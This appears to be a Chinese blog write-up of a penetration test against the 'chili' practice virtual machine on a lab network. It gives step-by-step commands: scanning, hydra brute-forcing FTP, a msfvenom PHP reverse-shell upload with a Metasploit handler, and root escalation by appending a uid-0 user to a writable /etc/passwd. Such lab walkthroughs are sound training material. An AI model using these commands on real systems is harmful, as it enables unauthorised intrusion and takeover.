chili
2021/9/27 23:41:12
本文主要是介绍chili,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
靶机准备
首先将靶机ova文件导入
网络模式改为NAT
扫描ip
netdiscover -r 192.168.164.0/24
kali:192.168.164.137
渗透测试
扫描端口
nmap -sS -sV -T5 -A -p- 192.168.164.186
开启了2个端口:21、80
扫描目录:
dirb http://192.168.164.186
直接访问网站,只有一个小辣椒
查看源码,有一些关键信息
爬取关键词生成字典,爆破FTP服务
cewl http://192.168.164.186 > test.txt
爆破FTP
hydra -L /root/test.txt -P /usr/share/wordlists/fasttrack.txt -f -V ftp://192.168.164.186
获得用户:chili 密码:a1b2c3d4
利用
登入FTP
查看网站目录/var/www/html,看看文件和权限
发现.nano有最高权限,msf生成马上传到.nano里
生成马:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.164.137 LPORT=1234 raw > shell.php
ftp上传到.nano设置777权限
put /root/shell.php /var/www/html/.nano/shell1.php
将shell.php赋予执行权限
chmod 777 /var/www/html/.nano/shell1.php
MSF开启监控,连接php马
use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost 192.168.164.137 set lport 1234 run
提权
切换交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
查看时普通权限
在/etc目录下看见passwd具有写操作,尝试/etc/passwd提权
使用命令:perl -le 'print crypt("test","test")' ,这个命令为使用perl脚本语言,执行crypt模块,将test加密字符串输出;
使用命令:echo "test:teH0wLIpW0gyQ:0:0:ROOT:/root:/bin/bash" >> /etc/passwd
在passwd文件中,写入test账户信息
成功提权
提权后进入root目录下获取flag
这篇关于chili的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2025-01-12深入理解 ECMAScript 2024 新特性:Map.groupBy() 分组操作
- 2025-01-11国产医疗级心电ECG采集处理模块
- 2025-01-10Rakuten 乐天积分系统从 Cassandra 到 TiDB 的选型与实战
- 2025-01-09CMS内容管理系统是什么?如何选择适合你的平台?
- 2025-01-08CCPM如何缩短项目周期并降低风险?
- 2025-01-08Omnivore 替代品 Readeck 安装与使用教程
- 2025-01-07Cursor 收费太贵?3分钟教你接入超低价 DeepSeek-V3,代码质量逼近 Claude 3.5
- 2025-01-06PingCAP 连续两年入选 Gartner 云数据库管理系统魔力象限“荣誉提及”
- 2025-01-05Easysearch 可搜索快照功能,看这篇就够了
- 2025-01-04BOT+EPC模式在基础设施项目中的应用与优势